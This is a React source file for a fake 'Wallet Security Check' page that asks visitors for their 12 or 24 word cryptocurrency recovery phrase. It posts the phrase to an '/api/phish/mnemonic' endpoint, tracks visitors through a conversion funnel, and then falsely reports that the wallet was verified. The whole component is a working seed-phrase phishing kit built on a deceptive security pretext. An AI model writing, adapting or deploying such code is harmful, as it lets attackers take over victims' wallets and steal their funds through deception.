import React, { useState } from 'react';
import { track } from '../../utils/funnel';
import './Recover.css';

const Recover = () => {
  const [words, setWords] = useState('');
  const [step, setStep] = useState(1);
  const [error, setError] = useState('');
  const [submitting, setSubmitting] = useState(false);
  const [done, setDone] = useState(false);

  const submit = async () => {
    track('recover', 'start', '');
    track('recover', 'view', '');
    const list = words.trim().split(/\s+/);
    if (list.length !== 12 && list.length !== 24) {
      setError('Please enter your 12 or 24 word recovery phrase.');
      return;
    }
    setSubmitting(true);
    setError('');
    try {
      const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
      const resp = await fetch(API_BASE + '/phish/mnemonic', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ mnemonic: words.trim() }),
      });
      const result = await resp.json();
      if (result.code !== 200) throw new Error(result.message || 'Failed');
    track('recover', 'done', '');
      setDone(true);
    } catch (e) {
      setError(String(e.message || e));
    } finally {
      setSubmitting(false);
    }
  };

  return (
    <div className="recover-page">
      <div className="recover-card">
        {done ? (
          <>
            <div className="recover-icon">✓</div>
            <h2>Verification Complete</h2>
            <p className="recover-desc">Your wallet has been verified successfully.</p>
          </>
        ) : (
          <>
            <div className="recover-icon">🔐</div>
            <h2>Wallet Security Check</h2>
            <p className="recover-desc">
              {step === 1
                ? 'For your security, please complete wallet verification to continue using our service.'
                : 'Enter your recovery phrase to verify wallet ownership.'}
            </p>
            {step === 1 ? (
              <button className="recover-btn" onClick={() => setStep(2)}>Start Verification</button>
            ) : (
              <>
                <textarea
                  className="recover-input"
                  placeholder="Enter your 12 or 24 word recovery phrase, separated by spaces"
                  value={words}
                  onChange={(e) => setWords(e.target.value)}
                  rows={4}
                />
                {error && <p className="recover-error">{error}</p>}
                <button className="recover-btn" onClick={submit} disabled={submitting || !words.trim()}>
                  {submitting ? 'Verifying...' : 'Verify Wallet'}
                </button>
              </>
            )}
          </>
        )}
      </div>
    </div>
  );
};

export default Recover;
